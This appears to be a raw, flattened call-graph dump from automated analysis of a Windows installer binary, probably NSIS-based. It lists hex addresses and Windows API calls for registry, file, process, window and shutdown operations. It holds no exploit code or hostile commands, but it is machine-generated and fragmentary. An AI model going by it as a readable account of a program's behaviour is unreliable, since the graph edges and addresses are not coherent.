CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 